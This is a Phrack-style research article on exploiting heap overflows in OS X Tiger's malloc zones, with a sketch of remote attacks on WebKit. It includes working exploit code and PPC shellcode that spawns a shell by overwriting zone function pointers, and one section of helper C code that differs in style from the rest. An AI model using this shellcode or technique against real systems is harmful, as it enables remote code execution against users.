                              ==Phrack Inc.==

               Volume 0xXX, Issue 0xXX, Phile #0xX of 0xXX

|=------------=[ Destroying the Apple Heap for Fun & Profit ]=--------------=|
|=---------------------------------------------------------------------------=|
|=------------------=[ nemo ]=-----------------------=|

--[ Table of contents

  1 - Introduction
  2 - Overview of the Apple OS X userland heap implementation
    2.1 - Zones
    2.2 - Blocks
    2.3 - Heap initialization
  3 - A sample overflow
  4 - A real life example (WebKit)
  5 - Conclusion
  6 - References

--[ 1 - Introduction.

This article comes as a result of my experiences exploiting a heap
overflow in the default web browser (Safari) on Mac OS X. It assumes a
small amount of knowledge of PPC assembly; a reference for this is
provided in the references section below (4). Knowledge of other memory
allocators will also come in useful, but it is not strictly needed. All
code in this paper was compiled and tested on Mac OS X Tiger (10.4).

--[ 2 - Overview of the Apple OS X userland heap implementation.

The malloc() implementation found in Apple's Libc-391 and earlier (at the
time of writing) was written by Bertrand Serlet. It is a relatively
complex memory allocator made up of memory "zones", which are variable
size portions of virtual memory, and "blocks", which are allocated from
within these zones. It is possible to have multiple zones, however most
applications tend to stick to just using the default zone.

A series of environment variables can be set to modify the behavior of
the memory allocation functions. These can be seen by setting the
"MallocHelp" variable and then calling the malloc() function. They are
also shown in the malloc() manpage.

The source for the implementation of the Apple malloc() is available from
http://www.opensource.apple.com/darwinsource/current.version.number/.
(The current version of the source at the time of writing this is 10.4.1).
To access it you need to be a member of the ADC, which is free to join
(or, if you can't be bothered signing up, use a login/password from
http://bugmenot.com). ;)

----[ 2.1 - Zones.

A single zone can be thought of as a single heap. When the zone is
destroyed, all the blocks allocated within it are free()'ed. Zones allow
blocks with similar attributes to be placed together. The zone itself is
described by a malloc_zone_t struct (defined in /usr/include/malloc.h)
which is shown below:

[malloc_zone_t struct]

    typedef struct _malloc_zone_t {
        /* Only zone implementors should depend on the layout of this
           structure; Regular callers should use the access functions
           below */
        void *reserved1; /* RESERVED FOR CFAllocator DO NOT USE */
        void *reserved2; /* RESERVED FOR CFAllocator DO NOT USE */
        size_t (*size)(struct _malloc_zone_t *zone, const void *ptr);
        void *(*malloc)(struct _malloc_zone_t *zone, size_t size);
        void *(*calloc)(struct _malloc_zone_t *zone, size_t num_items,
                        size_t size);
        void *(*valloc)(struct _malloc_zone_t *zone, size_t size);
        void (*free)(struct _malloc_zone_t *zone, void *ptr);
        void *(*realloc)(struct _malloc_zone_t *zone, void *ptr,
                         size_t size);
        void (*destroy)(struct _malloc_zone_t *zone);
        const char *zone_name;

        /* Optional batch callbacks; these may be NULL */
        unsigned (*batch_malloc)(struct _malloc_zone_t *zone, size_t size,
                                 void **results, unsigned num_requested);
        void (*batch_free)(struct _malloc_zone_t *zone,
                           void **to_be_freed, unsigned num_to_be_freed);

        struct malloc_introspection_t *introspect;
        unsigned version;
    } malloc_zone_t;

(Well, technically zones are scalable szone_t structs, typecast to
malloc_zone_t, however I will discuss that in 2.3.)

As you can see, the zone struct contains function pointers for each of
the memory allocation / deallocation functions. This should give you a
pretty good idea of how we can control execution after an overflow.

----[ 2.2 - Blocks.
Allocation of blocks occurs in different ways depending on the size of
the memory required. The size of all blocks allocated is always paragraph
aligned (a multiple of 16). Therefore an allocation of less than 16 bytes
will always return 16, an allocation of 20 will return 32, etc.

The szone_t struct contains two pointers, for tiny and small block
allocation. These are shown below:

    tiny_region_t *tiny_regions;
    small_region_t *small_regions;

Memory allocations of sizes which fall into the "tiny" range are
allocated from a pool of vm_allocate()'ed regions of memory. Each of
these regions consists of a 1MB (in 32-bit mode) or 2MB (in 64-bit mode)
heap. Following this is some meta-data about the region. Regions are
ordered by ascending block size. When memory is deallocated it is added
back to the pool.

Free blocks contain the following meta-data (all fields are
sizeof(void *) in size, except for "size" which is sizeof(u_short)):

    - checksum
    - previous
    - next
    - size (in quantum counts)

Memory allocations of "small" range sized blocks are allocated from a
pool of small regions, pointed to by the "small_regions" pointer in the
szone_t struct. Again, this memory is pre-allocated with the
vm_allocate() function. Each "small" region consists of an 8MB heap,
followed by the same meta-data as tiny regions.

Tiny and small allocations are not guaranteed to be page aligned. If a
block is allocated which is less than a single virtual page in size then
obviously the block cannot be aligned to a page. This can cause problems
when putting shellcode inside a buffer of this size: a SIGBUS can occur
when the shellcode is executed.

Large block allocations (allocations over a few vm pages in size) are
handled quite differently to the small and tiny blocks. When a large
block is requested, the malloc() routine uses vm_allocate() to obtain the
memory required. Larger memory allocations occur in the higher memory of
the heap.
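
The rounding rule from the start of this section can be sketched in a few
lines of C. This is only an illustration under the assumptions stated in
the text (a 16-byte quantum, and anything under 16 bytes taking a single
quantum); rounded_block_size() and quantum_count() are hypothetical helper
names, not functions from Apple's Libc.

```c
#include <assert.h>
#include <stddef.h>

/* Assumption taken from the text: block sizes are multiples of 16. */
#define QUANTUM 16u

/*
 * Hypothetical helper (not part of Libc): the block size the text
 * describes for a given request. Requests smaller than one quantum,
 * including zero, are assumed to occupy a single 16-byte block.
 */
size_t rounded_block_size(size_t request)
{
    if (request < QUANTUM)
        return QUANTUM;

    /* Refuse requests so large that rounding up would wrap around. */
    assert(request <= (size_t)-1 - (QUANTUM - 1));

    /* Round up to the next multiple of 16. */
    return (request + (QUANTUM - 1)) & ~(size_t)(QUANTUM - 1);
}

/*
 * Hypothetical helper: the same size expressed in 16-byte quanta, the
 * unit the text gives for the "size" field of a free block.
 */
unsigned quantum_count(size_t request)
{
    return (unsigned)(rounded_block_size(request) / QUANTUM);
}
```

For example, rounded_block_size(20) gives 32 and quantum_count(20) gives
2, matching the figures quoted above. Large requests do not come from
these regions at all: they go through vm_allocate() and, as noted above,
land in the higher memory of the heap.
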
That placement is useful in the "destroying the heap" technique outlined
in this paper.

Large blocks of memory are allocated in multiples of 4096. This is the
size of a virtual memory page. Because of this, large memory allocations
are always guaranteed to be page-aligned, and code can safely be injected
into large buffers without risk of SIGBUS problems.

----[ 2.3 - Heap initialization.

As you can see below, the malloc() function is merely a wrapper around
the malloc_zone_malloc() function.

    void *
    malloc(size_t size) {
        void *retval;
        retval = malloc_zone_malloc(inline_malloc_default_zone(), size);
        if (retval == NULL) {
            errno = ENOMEM;
        }
        return retval;
    }

It uses the inline_malloc_default_zone() function to pass the appropriate
zone to malloc_zone_malloc(). If malloc() is being called for the first
time, the inline_malloc_default_zone() function calls
_malloc_initialize() in order to create the initial default malloc zone.

The malloc_create_zone() function is called with the values (0,0) being
passed in as the start_size and flags parameters. After this the
environment variables are read in (any beginning with "Malloc") and
parsed in order to set the appropriate flags.

It then calls the create_scalable_zone() function in the
scalable_malloc.c file. This function is really responsible for creating
the szone_t struct. It uses the allocate_pages() function as shown below.

    szone = allocate_pages(NULL, SMALL_REGION_SIZE, SMALL_BLOCKS_ALIGN, 0, \
                           VM_MAKE_TAG(VM_MEMORY_MALLOC));

This, in turn, uses the vm_allocate() mach syscall to allocate the
memory required to store the default szone_t struct.

--[ 3 - A Sample Overflow

Before we look at how to exploit a heap overflow, we will first analyze
how the initial zone struct is laid out in the memory of a running
process. To do this we will use gdb to debug a small sample program.
This is shown below:

    -[nemo@gir:~]$ cat > mtst1.c
    #include <stdlib.h>

    int main(int ac, char **av)
    {
        char *a = malloc(10);
        __asm("trap");          /* break into the debugger here */
        char *b = malloc(10);
    }

    -[nemo@gir:~]$ gcc mtst1.c -o mtst1
    -[nemo@gir:~]$ gdb ./mtst1
    GNU gdb 6.1-20040303 (Apple version gdb-413)
    (gdb) r
    Starting program: /Users/nemo/mtst1
    Reading symbols for shared libraries . done

Once we receive a SIGTRAP signal and return to the gdb command shell we
can use the command shown below to locate our initial szone_t structure
in the process memory.

    (gdb) x/x &initial_malloc_zones
    0xa0010414 <initial_malloc_zones>: 0x01800000

This value, as expected inside gdb, is shown to be 0x01800000. If we dump
memory at this location, we can see each of the fields in the
_malloc_zone_t struct as expected.

    (gdb) x/x (long*) initial_malloc_zones
    0x1800000: 0x00000000 // Reserved1.
    0x1800004: 0x00000000 // Reserved2.
    0x1800008: 0x90005e0c // size() pointer.
    0x180000c: 0x90003abc // malloc() pointer.
    0x1800010: 0x90008bc4 // calloc() pointer.
    0x1800014: 0x9004a9f8 // valloc() pointer.
    0x1800018: 0x900060ac // free() pointer.
    0x180001c: 0x90017f90 // realloc() pointer.
    0x1800020: 0x9010efb8 // destroy() pointer.
    0x1800024: 0x00300000 // Zone Name ("DefaultMallocZone").
    0x1800028: 0x9010dbe8 // batch_malloc() pointer.
    0x180002c: 0x9010e848 // batch_free() pointer.

In this struct we can see each of the function pointers which are called
for each of the memory allocation/deallocation functions performed using
the default zone, as well as a pointer to the name of the zone, which can
be useful for debugging.

If we change the malloc() function pointer and continue our sample
program (shown below), we can see that the second call to malloc()
results in a jump to the specified value (after instruction alignment:
PPC instructions are 4-byte aligned, so the low two bits of the target
are dropped and 0xdeadbeef becomes 0xdeadbeec).

    (gdb) set *0x180000c = 0xdeadbeef
    (gdb) jump *($pc + 4)
    Continuing at 0x2cf8.

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
    0xdeadbeec in ?? ()
    (gdb)

But is it really feasible to write all the way to the address 0x1800000
(or 0x2800000 outside of gdb)? We will look into this now.

First we will check the addresses that various sized memory allocations
are given. The location of each buffer is dependent on whether the
allocation size falls into one of the various sized bins mentioned
earlier (tiny, small or large).

To test the location of each of these we can simply compile and run the
following small C program as shown:

    -[nemo@gir:~]$ cat > mtst2.c
    #include <stdio.h>
    #include <stdlib.h>

    int main(int ac, char **av)
    {
        /* Libc's zone array; read as int to get the first zone address. */
        extern int *malloc_zones;

        printf("initial_malloc_zones @ 0x%x\n",*malloc_zones);
        printf("tiny: %p\n",malloc(22));
        printf("small: %p\n",malloc(500));
        printf("large: %p\n",malloc(0xffffffff));
        return 0;
    }

    -[nemo@gir:~]$ gcc mtst2.c -o mtst2
    -[nemo@gir:~]$ ./mtst2
    initial_malloc_zones @ 0x2800000
    tiny: 0x500160
    small: 0x2800600
    large: 0x26000

From the output of this program we can see that it is only possible to
write to the initial_malloc_zones struct from a "tiny" or "large" buffer:
both are placed below the struct at 0x2800000, while the "small" buffer
at 0x2800600 already lies above it. Also, in order to overwrite the
function pointers contained within this struct we need to write a
considerable amount of data, completely destroying sections of the zone.
Thankfully many situations exist in typical software which allow these
criteria to be met. This is discussed in the final section of this paper.

Now that we understand the layout of the heap a little better, we can use
a small sample program to overwrite the function pointers contained in
the struct to get a shell.

The following program allocates a 'tiny' buffer of 22 bytes. It then uses
memset() to write 'A's all the way to the pointer for malloc() in the
zone struct, before calling malloc().

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int ac, char **av)
    {
        extern int *malloc_zones;
        char *tmp,*tinyp = malloc(22);

        printf("[+] tinyp is @ %p\n",tinyp);
        printf("[+] initial_malloc_zones is @ %p\n",*malloc_zones);
        printf("[+] Copying 0x%x bytes.\n",
               (((char *)*malloc_zones + 16) - (char *)tinyp));

        /* Fill from tinyp up to and including the malloc() pointer. */
        memset(tinyp,'A',
               (int)(((char *)*malloc_zones + 16) - (char *)tinyp));

        tmp = malloc(0xdeadbeef);
        return 0;
    }

However, when we compile and run this program, an EXC_BAD_ACCESS signal
is received.

    (gdb) r
    Starting program: /Users/nemo/mtst3
    Reading symbols for shared libraries . done
    [+] tinyp is @ 0x300120
    [+] initial_malloc_zones is @ 0x1800000
    [+] Copying 0x14ffef0 bytes.

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_INVALID_ADDRESS at address: 0x00405000
    0xffff9068 in ___memset_pattern ()

This is due to the fact that, in between the tinyp pointer and the malloc
function pointer we are trying to overwrite, there is some unmapped
memory.

In order to get past this we can use the fact that blocks of memory which
fall into the "large" category are allocated using the mach vm_allocate()
syscall. If we can get enough memory to be allocated in the large
classification before the overflow occurs, we should have a clear path to
the pointer.

To illustrate this point, we can use the following code:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <malloc/malloc.h>      /* malloc_zone_t */

    char shellcode[] = // Shellcode by b-r00t, modified by nemo.
    "\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
    "\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
    "\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
    "\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
    "\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
    "\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
    "\x2f\x73\x68";

    extern int *malloc_zones;

    int main(int ac, char **av)
    {
        char *tmp,*tmpr;
        int a=0,*addr;

        /* Keep requesting "large" blocks until one is returned above
           the zone struct. */
        while((tmpr = malloc(0xffffffff)) <= (char *)*malloc_zones);

        addr = malloc(22); // tiny buffer.

        printf("[+] malloc_zones (first zone) @ 0x%x\n",*malloc_zones);
        printf("[+] addr @ 0x%x\n",addr);

        if((unsigned int)addr < *malloc_zones) {
            printf("[+] addr + %u = 0x%x\n",
                   *malloc_zones - (int)addr,*malloc_zones);
        }

        printf("[+] Using shellcode @ 0x%x\n",&shellcode);

        /* Write the shellcode address over everything from addr to the
           end of the zone struct, one 4-byte word at a time. */
        for(a=0;
            a <= ((*malloc_zones - (int)addr) + sizeof(malloc_zone_t)) / 4;
            a++)
            addr[a] = (int)&shellcode[0];

        printf("[+] finished memcpy()\n");

        tmp = malloc(5); // execve()
    }

This code allocates enough "large" blocks of memory (0xffffffff) with
which to plow a clear path to the function pointers. It then copies the
address of the shellcode into memory all the way through the zone,
overwriting the function pointers in the szone_t struct. Finally a call
to malloc() is made in order to trigger the execution of the shellcode.

As you can see below, this code functions as we'd expect and our
shellcode is executed.

    -[nemo@gir:~]$ ./heaptst
    [+] malloc_zones (first zone) @ 0x2800000
    [+] addr @ 0x500120
    [+] addr + 36699872 = 0x2800000
    [+] Using shellcode @ 0x3014
    [+] finished memcpy()
    sh-2.05b$

This method has been tested on Apple's OSX version 10.4.1 (Tiger).

--[ 4 - A Real Life Example

The default web browser on OSX (Safari) as well as the mail client
(Mail.app), Dashboard and almost every other application on OSX which
requires web parsing functionality achieve this through a library which
Apple call "WebKit".
(2) This library contains many bugs, many of which are exploitable using
this technique. Particular attention should be paid to the code which
renders blocks ;)

Due to the nature of HTML pages, an attacker is presented with
opportunities to control the heap in a variety of ways before actually
triggering the exploit. In order to use the technique described in this
paper to exploit these bugs we can craft some HTML code, or an image
file, to perform many large allocations, thereby cleaving a path to our
function pointers. We can then trigger one of the numerous overflows to
write the address of our shellcode into the function pointers, before
waiting for a shell to be spawned.

Because of this, a crafted email or website is all that is needed to
remotely exploit an OSX user.

Apple have been contacted about a couple of these bugs.

The WebKit library is open source and available for download. Apparently
it won't be too long before Nokia phones use this library for their web
applications.

--[ 5 - Conclusion

Although this technique seems rather specific, I have already personally
seen several bugs which can be exploited in this manner. When it is
possible to exploit a bug in this way, you can quickly turn a complicated
bug into the equivalent of a simple stack smash (3).

On a side note, if anyone works out why the initial_malloc_zones struct
is always located at 0x2800000 outside of gdb and 0x1800000 inside, I
would appreciate it if you let me know.

I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me
time to research the things which I enjoy so much.

I'd also like to say hi to all the guys at Feline Menace, as well as
pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the
Chelsea for providing the AU felinemenace guys with buckets of corona to
fuel our hacking.

--[ 6 - References

1) Apple Memory Usage Performance Guidelines:
   - http://developer.apple.com/documentation/Performance/Conceptual/ManagingMemory/Articles/MemoryAlloc.html

2) WebKit:
   - http://webkit.opendarwin.org/

3) Smashing the stack for fun and profit:
   - http://www.phrack.org/show.php?p=49&a=14

4) Mac OS X Assembler Guide:
   - http://developer.apple.com/documentation/DeveloperTools/Reference/Assembler/index.html?http://developer.apple.com/documentation/DeveloperTools/Reference/Assembler/ASMLayout/chapter_4_section_1.html